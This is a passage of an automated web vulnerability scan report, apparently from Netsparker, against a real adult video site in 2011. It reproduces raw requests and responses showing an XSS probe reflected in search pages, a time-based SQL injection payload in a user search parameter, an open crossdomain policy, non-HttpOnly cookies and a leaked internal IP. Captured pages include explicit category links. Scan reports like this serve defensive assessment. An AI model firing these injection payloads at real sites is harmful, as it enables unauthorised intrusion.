href="/video?c=21">Hardcore</a></li><li><a href="http://enter.pornhubpremium.com/track/NjUyNjoyNTozNg/join?tpl=join11">HD</a></li><li><a href="/video?c=36">Hentai</a></li><li><a href="/video?c=25">Interracial</a></li><li><a href="/video?c=26">Latina</a></li><li><a href="/video?c=27">Lesbian</a></li><li><a href="/video?c=22">Masturbation</a></li><li><a href="/video?c=28">Mature</a></li><li><a href="/video?c=29">MILF</a></li><li><a href="/video?c=2">Orgy</a></li><li><a href="/video?c=24">Outdoor</a></li><li><a href="/video?c=53">Party</a></li><li><a href="/video?c=30">Pornstar</a></li><li><a href="/video?c=41">POV</a></li><li><a href="/video?c=31">Reality</a></li><li><a href="/video?c=42">Red Head</a></li><li><a 
href="/video?c=67">Rough Sex</a></li><li><a href="/sex">Sex</a></li><li><a href="/shemale">Shemale</a></li><li><a href="/video?c=59">Small Tits</a></li><li><a href="/video?c=69">Squirt</a></li><li><a href="/video?c=33">Striptease</a></li><li><a href="/video?c=37">Teen</a></li><li><a href="/video?c=65">Threesome</a></li><li><a href="/video?c=23">Toys</a></li><li><a href="/video?c=43">Vintage</a></li><li><a href="/video?c=61">Webcam</a></li> </ul>
</div> </div>
<!-- videos pannel -->
<div class="nf-videos" style="width:802px;">
<!-- videos box -->
<div class="box-flex-top">
<h1>'&quot; ns= netsparker(0x000619) videos</h1>
<span>
<ul class="section_tabs">
<li class="section_tabs1"><a onmouseover="filters_show('none');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=mr"><var>Most Recent</var></a></li>
<li class="section_tabs2"><a onmouseover="filters_show('mostviewedsubmenu');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=mv"><var>Most Viewed</var></a></li>
<li class="section_tabs3"><a onmouseover="filters_show('toprated');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=tr"><var>Top Rated</var></a></li>
<li class="section_tabs4"><a onmouseover="filters_show('none');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=lg"><var>Longest</var></a></li>

</ul>
</span>
</div>
<div class="box-flex-cont" style="width:798px;float:right;padding-bottom:12px;">
<div class="jc-submenu-wrapper">
<ul class="jc-submenu-bar" id="mostviewedsubmenu">
<li><strong>Arrange Most Viewed By</strong></li>
<li><a href="/video/search?o=mv&amp;t=t&amp;search='&quot; ns= netsparker(0x000619) ">Daily</a></li>
<li><a href="/video/search?o=mv&amp;t=w&amp;search='&quot; ns= netsparker(0x000619) ">Weekly</a></li>
<li><a href="/video/search?o=mv&amp;t=m&amp;search='&quot; ns= netsparker(0x000619) ">Monthly</a></li>
<li><a href="/video/search?o=mv&amp;t=a&amp;search='&quot; ns= netsparker(0x000619) ">All time</a></li>
</ul>
<ul cla..

/video/search

http://www.pornhub.com/video/search?c=63&search=%27%22%20ns=%20alert(0x000FED)%20

Parameters

Parameter  Type  Value
c          GET   63
search     GET   '" ns= alert(0x000FED)

Request

GET /video/search?c=63&search=%27%22%20ns=%20netsparker(0x000FED)%20 HTTP/1.1
Referer: http://www.pornhub.com/gay
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:20:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5380
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <link rel="canonical" href="http://www.pornhub.com/video/search?c=63&amp;search='" ns= netsparker(0x000fed) " /><meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>No results found | PornHub.com</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 
'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" 
style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en_gay.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" 
href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" 
style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.juicyboys.com/track/OTk5NTo0MDo0Ng/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_blank">HD Videos</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/616295/437/13/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_gay_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." 
name="search" maxlength="75" id="search_value" /> <input type='hidden' name='c' value='63' /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div style="position:relative;float:left;width:960px;">

<!-- categories panel -->
<div class="nf-categories">
<!-- categories -->
<div class="box-flex-top"><h1>Categories<span>&nbsp;</span></h1></div>
<div class="box-flex-cont" style="width:146px;">
<ul class="nf-categories">
<li><a href="/video?c=3">Amateur</a></li><li><a href="/video?c=35">Anal</a></li><li><a href="/video?c=1">Asian</a></li><li><a href="/video?c=4">Ass</a></li><li><a href="/video?c=5">Babe</a></li><li><a href="/video?c=6">BBW</a></li><li><a href="/video?c=7">Big Dick</a></li><li><a href="/video?c=8">Big Tits</a></li><li><a href="/video?c=9">Blonde</a></li><li><a href="/video?c=13">Blowjob</a></li><li><a href="/video?c=10">Bondage</a></li><li><a href="/video?c=11">Brunette</a></li><li><a href="/video?c=14">Bukkake</a></li><li><a href="/video?c=74">Camel Toe</a></li><li><a href="/video?c=12">Celebrity</a></li><li><a href="/video?c=57">Compilation</a></li><li><a href="/video?c=15">Creampie</a></li><li><a href="/video?c=16">Cumshots</a></li><li><a href="/video?c=34">Dancing</a></li><li><a href="/video?c=72">Double Penetration</a></li><li><a href="/video?c=17">Ebony</a></li><li><a href="/video?c=55">Euro</a></li><li><a href="/video?c=73">Female Friendly</a><img src="http://cdn1.static.pornhub.phncdn.com/images/femalefriendly.gif" style="vertical-align:bottom;" /></li><li><a href="/video?c=18">Fetish</a></li><li><a href="/video?c=19">Fisting</a></li><li><a href="/video?c=32">Funny</a></li><li><a href="/gay">Gay</a></li><li><a href="/video?c=20">Handjob</a></li><li><a href="/video?c=21">Hardcore</a></li><li><a href="http://enter.pornhubpremium.com/track/NjUyNjoyNTozNg/join?tpl=join11">HD</a></li><li><a href="/video?c=36">Hentai</a></li><li><a href="/video?c=25">Interracial</a></li><li><a href="/video?c=26">Latina</a></li><li><a href="/video?c=27">Lesbian</a></li><li><a href="/video?c=22">Masturbation</a></li><li><a href="/video?c=28">Mature</a></li><li><a href="/video?c=29">MILF</a></li><li><a href="/video?c=2">Orgy</a></li><li><a href="/video?c=24">Outdoor</a></li><li><a href="/video?c=53">Party</a></li><li><a href="/video?c=30">Pornstar</a></li><li><a href="/video?c=41">POV</a></li><li><a href="/video?c=31">Reality</a></li><li><a href="/video?c=42">Red Head</a></li><li><a 
href="/video?c=67">Rough Sex</a></li><li><a href="/sex">Sex</a></li><li><a href="/shemale">Shemale</a></li><li><a href="/video?c=59">Small Tits</a></li><li><a href="/video?c=69">Squirt</a></li><li><a href="/video?c=33">Striptease</a></li><li><a href="/video?c=37">Teen</a></li><li><a href="/video?c=65">Threesome</a></li><li><a href="/video?c=23">Toys</a></li><li><a href="/video?c=43">Vintage</a></li><li><a href="/video?c=61">Webcam</a></li> </ul>
</div> </div>
<!-- videos pannel -->
<div class="nf-videos" style="width:802px;">
<!-- videos box -->
<div class="box-flex-top">
<h1>'&quot; ns= netsparker(0x000FED) Gay videos</h1>
<span>
<ul class="section_tabs">
<li class="section_tabs1"><a onmouseover="filters_show('none');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=mr"><var>Most Recent</var></a></li>
<li class="section_tabs2"><a onmouseover="filters_show('mostviewedsubmenu');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=mv"><var>Most Viewed</var></a></li>
<li class="section_tabs3"><a onmouseover="filters_show('toprated');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=tr"><var>Top Rated</var></a></li>
<li class="section_tabs4"><a onmouseover="filters_show('none');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=lg"><var>Longest</var></a></li>

</ul>
</span>
</div>
<div class="box-flex-cont" style="width:798px;float:right;padding-bottom:12px;">
<div class="jc-submenu-wrapper">
<ul class="jc-submenu-bar" id="mostviewedsubmenu">
<li><strong>Arrange Most Viewed By</strong></li>
<li><a href="/video/search?o=mv&amp;t=t&amp;c=63&amp;search='&quot; ns= netsparker(0x000FED) ">Daily</a></li>
<li><a href="/video/search?o=mv&amp;t=w&amp;c=63&amp;search='&quot; ns= netsparker(0x000FED) ">Weekly</a></li>
<li><a href="/video/search?o=mv&amp;t=m&amp;c=63&amp;search='&quot; ns= netspark..
Open Policy Crossdomain.xml Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified an open-policy Crossdomain.xml file.

Impact

An open-policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and read its responses. This can be used to access one-time tokens and CSRF nonces in order to bypass CSRF restrictions.

Remedy

Configure your Crossdomain.xml so that it does not grant access to your domain from everywhere.

- /crossdomain.xml

/crossdomain.xml CONFIRMED

http://www.pornhub.com/crossdomain.xml

Policy Rules

Request

GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 19:33:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 154
Content-Type: application/xml


<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code so that unexpected errors are handled. This should be a generic practice that does not disclose further information upon an error. All errors should be handled server side only.
- /user/search

/user/search CONFIRMED

http://www.pornhub.com/user/search?o=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&l=1

Parameters

Parameter Type Value
o GET -1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1
l GET 1

Request

GET /user/search?o=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&l=1 HTTP/1.1
Referer: http://www.pornhub.com/community
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4; flash_values=YToxOntzOjg6Im1lc3NhZ2VzIjthOjE6e3M6NToiZXJyb3IiO2E6MTp7aTowO3M6Mjc6IlRoaXMgdXNlciBpcyBub3QgYXZhaWxhYmxlLiI7fX19
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 02 Jun 2011 10:10:54 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20
Connection: close
Content-Type: text/html


Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after these changes, JavaScript code will not be able to read cookies).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

- /view_video.php

/view_video.php CONFIRMED

http://www.pornhub.com/view_video.php?viewkey=458626127

Identified Cookie

phub_in_player_security_key

Request

GET /view_video.php?viewkey=458626127 HTTP/1.1
Referer: http://www.pornhub.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Set-Cookie: phub_in_player_security_key=bf24c27075a8dd7d7b8b61b6c47bf7ee; expires=Sat, 02-Jul-2011 10:08:26 GMT; path=/; domain=.pornhub.com,phub_in_player=1; expires=Sat, 02-Jul-2011 10:08:26 GMT; path=/; domain=.pornhub.com
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 13599
Content-Type: text/html


[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is, then consider removing it.
- /front/flash10bug

/front/flash10bug

http://www.pornhub.com/front/flash10bug

Extracted IP Address(es)

10.1.102.64

Request

GET /front/flash10bug HTTP/1.1
Referer: http://www.pornhub.com/information
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:27:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5240
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Free Porn Videos &amp; Sex Movies - Porno, XXX, Porn Tube and Pussy Porn</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 
'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" 
style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/front/flash10bug" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header 
Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/front/flash10bug" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" 
onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div class="section_wrapper" id="feedback">
<div class="section_bar">
<div class="section_title_lc png"></div>
<h4 class="section_title">How To Disable Flash Hardware Acceleration</h4>
<div class="section_title_rc png"></div>
<div class="videos_wrapper">
